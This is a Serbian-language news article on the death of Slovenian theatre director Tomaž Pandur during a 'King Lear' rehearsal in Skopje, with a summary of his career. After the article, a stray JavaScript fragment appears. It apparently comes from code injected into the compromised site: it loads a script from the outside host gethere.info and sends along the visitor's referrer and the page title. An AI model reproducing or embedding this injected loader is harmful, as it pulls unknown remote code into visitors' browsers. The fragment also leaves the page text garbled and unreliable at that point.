Tomaž Pandur umro u Skoplju na probi

Tomaž Pandur umro u Skoplju na probi

Reditelj Tomaž Pandur


Srčani udar prekinuo život i karijeru istaknutog slovenačkog i evropskog savremenog pozorišnog reditelja

Tokom probe predstave “Kralj Lir” Makedonskog narodnog teatra usled srčanog udara preminuo istaknuti pozorišni reditelj Tomaž Pandur (52).

Rođen 1963. godine u Mariboru, kao gimnazijalac u rodnom Mariboru osnovao je svoju prvu pozorišnu trupu „Tespisov voz – Novo slovensko gledališče”. Tomaž Pandur je režiju diplomirao u Ljubljani 1989. godine, a posljednjih godina u Madridu je vodio svoju pozorišnu trupu “Pandur Theaters”.

Ostao je zapamćen po režiji mnogih uspešnih predstava, kao što su “Faust”, “Hamlet” i “Medeja”, a u Beogradu je režirao scensku verziju “Hazarskog rečnika” Milorada Pavića, “Tesla elektrik kompani”.

Ove režije stavile su ga u sam vrh slovenačke savremene režije. Devedesetih godina prošlog veka, seli se u Njujork, da bi neku godinu kasnije za mesto življenja izabrao Madrid, gde je osnovao trupu.

Vest o smrti Tomaža Pandura preneo je El pais, ali i gotovo svi značajniji španski mediji zainteresovani za umetnost, nazivajući umetnika “princem samoće” i istinskim zaljubljenikom tetra i velikanom evropskog pozorišta.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

loading...

+ Trenutno nema komentara

Dodajte komentar